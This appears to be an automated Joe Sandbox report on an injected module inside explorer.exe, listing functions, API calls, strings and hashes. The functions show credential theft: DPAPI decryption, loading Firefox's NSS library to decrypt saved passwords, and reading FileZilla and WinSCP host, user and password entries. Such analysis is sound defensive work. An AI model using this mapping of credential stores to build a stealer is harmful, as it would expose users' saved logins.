Function 02971FCE Relevance: 3.0, APIs: 2, Instructions: 49encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02971FFA
RtlMoveMemory.NTDLL(?,?,?), ref: 02972015

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: CryptDataMemoryMoveUnprotect
String ID:
API String ID: 2807545630-0
Opcode ID: f76e6d2c320ccb3e2fec50a739b4aba6a143ba593232c4cb48dc265811a0969d
Instruction ID: 29b298f0d2cbe584d86b5c58683553ae640ff9b2bea3dc21f3b9b9fa94f07cc5
Opcode Fuzzy Hash: f76e6d2c320ccb3e2fec50a739b4aba6a143ba593232c4cb48dc265811a0969d
Instruction Fuzzy Hash: 6801ECB1F11219AB9B25DF9AE884DBFBBFCEF45650B10046AF905E3200D7719A10CBA0

Function 02971198 Relevance: 3.0, APIs: 2, Instructions: 38encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 029711B2

Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A

CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?,?,?,00000001,00000000,?), ref: 029711D2

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: BinaryCryptHeapString$AllocateProcess
String ID:
API String ID: 3825993179-0
Opcode ID: 5c57eb93d3ca2cf5c6f65512d1dbb96ada3dcb784f3b19b9261018100361325a
Instruction ID: 74b4379c830fb2943f32daaff185a04866ab4b79bca4167bcb619759b2498396
Opcode Fuzzy Hash: 5c57eb93d3ca2cf5c6f65512d1dbb96ada3dcb784f3b19b9261018100361325a
Instruction Fuzzy Hash: A0F0A73260011877D720C597DC85DFBFB6DEFC56B5B100169F90DE7141DA629D0487A0

Function 02974440 Relevance: 38.8, APIs: 12, Strings: 10, Instructions: 289stringcommemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(029C62B0,00000000,00000001,029C62A0,?), ref: 0297445F
SysAllocString.OLEAUT32(?), ref: 029744AA
lstrcmpiW.KERNEL32(RecentServers,?), ref: 0297456E
lstrcmpiW.KERNEL32(Servers,?), ref: 0297457D
lstrcmpiW.KERNEL32(Settings,?), ref: 0297458C

Part of subcall function 029711E1: lstrlenW.KERNEL32(?,774CF360,00000000,?,00000000,?,029746E3), ref: 029711ED
Part of subcall function 029711E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0297120F
Part of subcall function 029711E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 02971231

lstrcmpiW.KERNEL32(Server,?), ref: 029745BE
lstrcmpiW.KERNEL32(LastServer,?), ref: 029745CD
lstrcmpiW.KERNEL32(Host,?), ref: 02974657
lstrcmpiW.KERNEL32(Port,?), ref: 02974679
lstrcmpiW.KERNEL32(User,?), ref: 0297469F
lstrcmpiW.KERNEL32(Pass,?), ref: 029746C5
wsprintfW.USER32 ref: 0297471E

Strings

RecentServers, xrefs: 02974569
Settings, xrefs: 02974587
Port, xrefs: 02974674
LastServer, xrefs: 029745C8
User, xrefs: 0297469A
Servers, xrefs: 02974578
Server, xrefs: 029745B9
Pass, xrefs: 029746C0
Host, xrefs: 02974652
%s:%s, xrefs: 02974718

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
API String ID: 2230072276-1234691226
Opcode ID: 30ef1c07f6a60cf1e7a6160a6ed081aa051278765ee129203cd7c8fc4cb5d271
Instruction ID: 8bed674b149ae6d8d24dae5f710afdfa3be102e37b0d3be659cd8111147ab008
Opcode Fuzzy Hash: 30ef1c07f6a60cf1e7a6160a6ed081aa051278765ee129203cd7c8fc4cb5d271
Instruction Fuzzy Hash: 4CB10771204306AFD700DF64C884E6AB7F9EFC9749F10895CF6898B261DB71E906CB62

Function 029724B0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A

Part of subcall function 02971090: lstrlenW.KERNEL32(?,?,00000000,029717E5), ref: 02971097
Part of subcall function 02971090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 029710A8

Part of subcall function 029719B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02972CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 029719C4

GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 02972503
SetCurrentDirectoryW.KERNEL32(00000000), ref: 0297250A
LoadLibraryW.KERNEL32(00000000), ref: 02972563
SetCurrentDirectoryW.KERNEL32(?), ref: 02972570
GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 02972591
GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0297259E
GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 029725AB
GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 029725B8
GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 029725C5
GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 029725D2
GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 029725DF

Part of subcall function 0297190B: lstrlen.KERNEL32(?,?,?,?,00000000,02972783), ref: 0297192B
Part of subcall function 0297190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,02972783), ref: 02971930
Part of subcall function 0297190B: lstrcat.KERNEL32(00000000,?), ref: 02971946
Part of subcall function 0297190B: lstrcat.KERNEL32(00000000,00000000), ref: 0297194A

Strings

PK11SDR_Decrypt, xrefs: 029725C7
PK11_GetInternalKeySlot, xrefs: 029725AD
nss3.dll, xrefs: 02972510
PK11_Authenticate, xrefs: 029725BA
sql:, xrefs: 0297262B
NSS_Init, xrefs: 0297258B
SECITEM_FreeItem, xrefs: 029725A0
NSS_Shutdown, xrefs: 02972593
PK11_FreeSlot, xrefs: 029725D4

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
API String ID: 3366569387-3272982511
Opcode ID: 1fa8522e967e3dc700fef834f08aa48bab7e15210f2ad5aa11d1f18639dc87af
Instruction ID: 9d75fb0d050f95870dbdb26b3872debd8754f97be6598e3677d755ca32bbc828
Opcode Fuzzy Hash: 1fa8522e967e3dc700fef834f08aa48bab7e15210f2ad5aa11d1f18639dc87af
Instruction Fuzzy Hash: CF410036E463418BDB14AF39A85453E3BEEDBC5650710083FE94AE3240DB748C42DF52

Function 02975E5A Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 382COMMON

Download Yara Rule

APIs

Part of subcall function 02975BF5: memset.NTDLL ref: 02975C07

_alldiv.NTDLL(?,?,05265C00,00000000), ref: 029760E1
_allrem.NTDLL(00000000,?,00000007,00000000), ref: 029760EC
_alldiv.NTDLL(?,?,000003E8,00000000), ref: 02976113
_alldiv.NTDLL(?,?,05265C00,00000000), ref: 0297618E
_alldiv.NTDLL(?,?,05265C00,00000000), ref: 029761B5
_allrem.NTDLL(00000000,?,00000007,00000000), ref: 029761C1

Strings

%03d, xrefs: 029761F3
W, xrefs: 02976193
%06.3f, xrefs: 02976229
%02d, xrefs: 02976039, 029761D3
%lld, xrefs: 02976122
%.16g, xrefs: 02976077
%04d, xrefs: 02976016

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: _alldiv$_allrem$memset
String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
API String ID: 2557048445-1989508764
Opcode ID: 48769dc009b9e64672a5310fe8422f078904757d263a064708bc08815ea33156
Instruction ID: e88cafdf0ded1ac8e58c58a0823c2dfea66def07c51eac86503bca3aaddcde9c
Opcode Fuzzy Hash: 48769dc009b9e64672a5310fe8422f078904757d263a064708bc08815ea33156
Instruction Fuzzy Hash: 2CB1AFB2A08742AFD7619E24CC84B3A7FDDFBD1348F65095DF882E61D0E721D910CA95

Function 0298D2AC Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 169COMMON

Download Yara Rule

APIs

memcmp.NTDLL(029C637A,BINARY,00000007), ref: 0298D324

Strings

program, xrefs: 0298D46A
BINARY, xrefs: 0298D31E
(%.20s), xrefs: 0298D38A
NULL, xrefs: 0298D40F
,%d, xrefs: 0298D444
k(%d, xrefs: 0298D2EE
,%s%s, xrefs: 0298D34E
(blob), xrefs: 0298D416
%lld, xrefs: 0298D3CA
%s(%d), xrefs: 0298D3AB
vtab:%p, xrefs: 0298D423
%.16g, xrefs: 0298D3E5

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: memcmp
String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
API String ID: 1475443563-3683840195
Opcode ID: 2efd4f34c8fc4f6d4e5d57e2f84b9aaaa457c37db6a061f2606e3b859efdcde9
Instruction ID: 4275571cdec7a48fd16c9dad8e2b1fc20af4271e58c13666bbb24df02294bbc2
Opcode Fuzzy Hash: 2efd4f34c8fc4f6d4e5d57e2f84b9aaaa457c37db6a061f2606e3b859efdcde9
Instruction Fuzzy Hash: D051D231504340ABD715AF75CC40ABBB3EABB85604F180CAEF9569B2D1E370E905CBA2

Function 029748B1 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 029719E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971A1E
Part of subcall function 029719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02971A3C
Part of subcall function 029719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02971A75
Part of subcall function 029719E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971A98

Part of subcall function 0297482C: lstrlenW.KERNEL32(?), ref: 02974845
Part of subcall function 0297482C: lstrlenW.KERNEL32(?), ref: 0297488F
Part of subcall function 0297482C: lstrlenW.KERNEL32(?), ref: 02974897

wsprintfW.USER32 ref: 029749A7
wsprintfW.USER32 ref: 029749B9

Strings

Password, xrefs: 029748E4
%s:%u, xrefs: 02974971, 029749B7
HostName, xrefs: 029748C4
UserName, xrefs: 029748D2
%s:%u/%s, xrefs: 02974982, 029749A5
RemoteDirectory, xrefs: 029748F8

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: lstrlen$QueryValuewsprintf$CloseOpen
String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
API String ID: 2889301010-4273187114
Opcode ID: cb35403b49e535d7d7c4610be2dc51498f98d6b7cbdda6d51d82691127de9721
Instruction ID: 1bd21cbdf71cf1974dde0b47112681bc5a84c2f2c5810b7067cbd836757e9a84
Opcode Fuzzy Hash: cb35403b49e535d7d7c4610be2dc51498f98d6b7cbdda6d51d82691127de9721
Instruction Fuzzy Hash: 2F31E426B043546BD710AB65CC4492BB6FEFFCAF88B15492DF04997241DBB2DC018BA2

Function 0297F92F Relevance: 12.4, APIs: 4, Strings: 4, Instructions: 350COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?,?,00000000), ref: 0297FB32
memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0297FB4D
memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0297FB60
memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 0297FB95

Strings

immutable, xrefs: 0297FC68
-wal, xrefs: 0297FBA9
nolock, xrefs: 0297FC4E
-journal, xrefs: 0297FB6B

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: memcpy
String ID: -journal$-wal$immutable$nolock
API String ID: 3510742995-3408036318
Opcode ID: 8be47073428cc6fa6d29a5e6d9420b5b2d78234572545a345cee94552d05f15c
Instruction ID: d32d42de1f455b38343ac306e3eeae9b8b003aa73ab1eadd0d1a7f575ef6a43d
Opcode Fuzzy Hash: 8be47073428cc6fa6d29a5e6d9420b5b2d78234572545a345cee94552d05f15c
Instruction Fuzzy Hash: A1D1B2B16083419FDB14DF28C880B2ABBE6AFD5314F18456DEC999B391E775D804CF62

Function 02977820 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 407COMMON

Download Yara Rule

Strings

NaN, xrefs: 029773F8
%, xrefs: 02977822
-x0, xrefs: 02977325

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID:
String ID: %$-x0$NaN
API String ID: 0-62881354
Opcode ID: 13791b943334541f1abfee32d520549fe02b031f5a15e521c54a5789260038a6
Instruction ID: ec2b81652d691b7cf63983a415b5396f87ea86e0873c804f35b9a20ec5ec82fb
Opcode Fuzzy Hash: 13791b943334541f1abfee32d520549fe02b031f5a15e521c54a5789260038a6
Instruction Fuzzy Hash: A9D1D330A0C7828BD7258A6884907BBFFE9AFCA208F18496DF8C197351D764C945CB92

Function 029778B0 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 441COMMON

Download Yara Rule

Strings

NaN, xrefs: 029773F8
-x0, xrefs: 02977325

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: 1872ff66b82106bfbfd3324037a87637e6b5fbcd1dba27487417621f44d014d3
Instruction ID: a430e4774a26fe7240c2804cd9d3784e3e93612c1da6f017441461021249dbef
Opcode Fuzzy Hash: 1872ff66b82106bfbfd3324037a87637e6b5fbcd1dba27487417621f44d014d3
Instruction Fuzzy Hash: 71E1E530A0C7828FD7258E68C4907BBFFE9AFCA208F18496DE8D597351D764C945CB92

Function 02977A5C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 431COMMON

Download Yara Rule

Strings

NaN, xrefs: 029773F8
-x0, xrefs: 02977325

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: 6a8d5d91bbbd4d1bb7eb7a26c7580308d43e487d2c931f996723dc8528ce691f
Instruction ID: cb15c24dd248b5bf911b02be9af04c1d1a891eead185fea2f8ba456083913bf7
Opcode Fuzzy Hash: 6a8d5d91bbbd4d1bb7eb7a26c7580308d43e487d2c931f996723dc8528ce691f
Instruction Fuzzy Hash: 86E1D37060C7828FD7258E6884907BBFBEAAFCA308F18496DF8C597351D764C945CB92

Function 02977A28 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 426COMMON

Download Yara Rule

Strings

NaN, xrefs: 029773F8
-x0, xrefs: 02977325

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: b1e04cac4cba108dc8f221361dcc71a9579e327f1ba7459e95575db1420db3c4
Instruction ID: 097bcc89e0a7e8aed8fab4e17bca3166564095b08857c344657f8113f4c48904
Opcode Fuzzy Hash: b1e04cac4cba108dc8f221361dcc71a9579e327f1ba7459e95575db1420db3c4
Instruction Fuzzy Hash: F0E1E330A0C7828FD7258E6884907BAFFE9AFC9208F18496EE8C597351D774C945CB92

Function 029777F9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 414COMMON

Download Yara Rule

Strings

NaN, xrefs: 029773F8
-x0, xrefs: 02977325

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: 946e524f68a7bb86034ca7a16eccbe8b7b6f740f405fb6f9d605fe3361d109db
Instruction ID: 4c368b687350666fd90848a9d9a5fb1b03842a8b0698363df256f11ca083e1f6
Opcode Fuzzy Hash: 946e524f68a7bb86034ca7a16eccbe8b7b6f740f405fb6f9d605fe3361d109db
Instruction Fuzzy Hash: 6BE1D47060C7828FD7258E6884947BAFFE9AFCA308F18486DF8C597351D764C945CB92

Function 029770C9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 403COMMON

Download Yara Rule

APIs

_aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 0297720E
_aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 02977226
_aulldvrm.NTDLL(00000000,00000000,?), ref: 0297727B

Strings

NaN, xrefs: 029773F8
-x0, xrefs: 02977325

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: _aulldvrm$_aullrem
String ID: -x0$NaN
API String ID: 105165338-3447725786
Opcode ID: 31eb5595d92d2bd72e33c450c55a4f62c4ae0ae84be5d26e3ad54a7eeb3d3971
Instruction ID: 14d95ec01a017a3ad07e44ab94e3645fd5fb9830f74e963def9b0293f5ac27cf
Opcode Fuzzy Hash: 31eb5595d92d2bd72e33c450c55a4f62c4ae0ae84be5d26e3ad54a7eeb3d3971
Instruction Fuzzy Hash: A6D1E47060C7828FD7258E6884907BBFFE9AFCA208F18586DF8C597351D764C945CB92

Function 0297898F Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 353COMMON

Download Yara Rule

APIs

_allmul.NTDLL(00000000,?,0000000A,00000000), ref: 02978AAD
_allmul.NTDLL(?,?,0000000A,00000000), ref: 02978B66
_allmul.NTDLL(?,00000000,0000000A,00000000), ref: 02978C9B
_alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 02978CAE

Strings

., xrefs: 02978B17

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: _allmul$_alldvrm
String ID: .
API String ID: 115548886-248832578
Opcode ID: 0938f6dc854d2a8e69ec9471accf5980eb2f6ca3df13cd2dcd735461e1f817c4
Instruction ID: 813bc81977d33c469f0c3d90d384ee4be3a267e792a4772580c65d775d3c6889
Opcode Fuzzy Hash: 0938f6dc854d2a8e69ec9471accf5980eb2f6ca3df13cd2dcd735461e1f817c4
Instruction Fuzzy Hash: 41D1F1B194D7858BC7249F18888832ABBF5FFC5314F084D6EF6C996281E3B18945DB86

Function 0299D684 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0299D6A0
memset.NTDLL ref: 0299D6B3
memset.NTDLL ref: 0299D6C3

Strings

9, xrefs: 0299D701
7, xrefs: 0299D71B
,, xrefs: 0299D6FC

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: memset
String ID: ,$7$9
API String ID: 2221118986-1653249994
Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
Instruction ID: 4373f2a05c5a0b78370a40624d183693e388f798f7d9394c69ed0199a41be1de
Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
Instruction Fuzzy Hash: BE3181715083849FD730DF64D880B8FBBE9AFC9350F00492EE98997251EB719548CBA3

Function 02971BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,?,02972E75,PathToExe,00000000,00000000), ref: 02971BCC
StrStrIW.SHLWAPI(00000000,.exe,?,02972E75,PathToExe,00000000,00000000), ref: 02971BF0
StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,02972E75,PathToExe,00000000,00000000), ref: 02971C05
lstrlenW.KERNEL32(00000000,?,02972E75,PathToExe,00000000,00000000), ref: 02971C1C

Strings

.exe, xrefs: 02971BEA

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: lstrlen
String ID: .exe
API String ID: 1659193697-4119554291
Opcode ID: 57a5d9f7009d02f15797836b9e57e5115c5c167f8571dd4565d18724acb0a647
Instruction ID: 5c0822f743595d87768fa23daf5033e37427b9a697efa45b8f76faa8dc7e19dc
Opcode Fuzzy Hash: 57a5d9f7009d02f15797836b9e57e5115c5c167f8571dd4565d18724acb0a647
Instruction Fuzzy Hash: 75F0F631B542209BE3386FB5AC44BBB63ACEF813417245C2EE14AD3190FB608941D759

Function 02982FF6 Relevance: 6.6, APIs: 5, Instructions: 369COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000018), ref: 0298316F
_allmul.NTDLL(-00000001,00000000,?,?), ref: 029831D2
_alldiv.NTDLL(?,?,00000000), ref: 029832DE
_allmul.NTDLL(00000000,?,00000000), ref: 029832E7
_allmul.NTDLL(?,00000000,?,?), ref: 02983392

Part of subcall function 029816CD: memset.NTDLL ref: 0298172B

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: _allmul$_alldivmemset
String ID:
API String ID: 3880648599-0
Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
Instruction ID: 6c2391df6bef467ccef3a615113a9ff22f9a8d45b68b7f535ee1e974ceedc6bc
Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
Instruction Fuzzy Hash: E9D19D716083418BDB24EF69C480B6EBBEAEFC4B04F18496EF99597250DB70D845CB86

Function 029A87FA Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 388COMMON

Download Yara Rule

Strings

old, xrefs: 029A889E
FOREIGN KEY constraint failed, xrefs: 029A8AC8
new, xrefs: 029A88AA

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID:
String ID: FOREIGN KEY constraint failed$new$old
API String ID: 0-384346570
Opcode ID: 145258e95d0b1d24b793da5a75a80041594f7611dc70a7b356f2befd2086e8ae
Instruction ID: c847ee06c4bd2b26ec3e0cfe0f3dc3c9bc74942946e09a9aa5283e35657db93a
Opcode Fuzzy Hash: 145258e95d0b1d24b793da5a75a80041594f7611dc70a7b356f2befd2086e8ae
Instruction Fuzzy Hash: A7D1F7707083009FDB14DB29C594B2FBBEAEBC8754F14491EE9458B290DB74D945CB92

Function 029796BC Relevance: 6.4, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

_alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 029796E7
_alldiv.NTDLL(00000000,80000000,?,?), ref: 02979707
_alldiv.NTDLL(00000000,80000000,?,?), ref: 02979739
_alldiv.NTDLL(00000001,80000000,?,?), ref: 0297976C
_allmul.NTDLL(?,?,?,?), ref: 02979798

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: _alldiv$_allmul
String ID:
API String ID: 4215241517-0
Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
Instruction ID: dd676b889338503c9735a1a5f86545780673f7698f75ca1bd0c2392ebfcd0448
Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
Instruction Fuzzy Hash: 86214D312047961BF7345D2D4CC0F2B75DFDBD27A9F254E2DED09A2250EB72940085A2

Function 0298B162 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000), ref: 0298B1B3
_alldvrm.NTDLL(?,?,00000000), ref: 0298B20F
_allrem.NTDLL(?,00000000,?,?), ref: 0298B28A
memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 0298B298

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: _alldvrm_allmul_allremmemcpy
String ID:
API String ID: 1484705121-0
Opcode ID: 84bf3754387aafdbdfd78c49232ada95936575408888d155a8a7e3f0bf6b4a2c
Instruction ID: 33b76a60ee13bb52ee7f28413240a5f51166507046c0b5ae053beeb022e489f1
Opcode Fuzzy Hash: 84bf3754387aafdbdfd78c49232ada95936575408888d155a8a7e3f0bf6b4a2c
Instruction Fuzzy Hash: 9C4139756083419FC714EF25C890A2FBBE6AFC8704F49892DF99597361DB31E805CB52

Function 02971895 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetHGlobalFromStream.COMBASE(?,?), ref: 029718A7
GlobalLock.KERNEL32(02974B57), ref: 029718B6
GlobalUnlock.KERNEL32(?), ref: 029718F4

Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A

RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 029718E8

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
String ID:
API String ID: 1688112647-0
Opcode ID: ee38a28f40aa586f72fd547ce54e229b177fec2070984c90fda660d774a1a46c
Instruction ID: ae0be717f801730edff84d5ed84dd2df22e48e7b96b031140ce597e7b517b10b
Opcode Fuzzy Hash: ee38a28f40aa586f72fd547ce54e229b177fec2070984c90fda660d774a1a46c
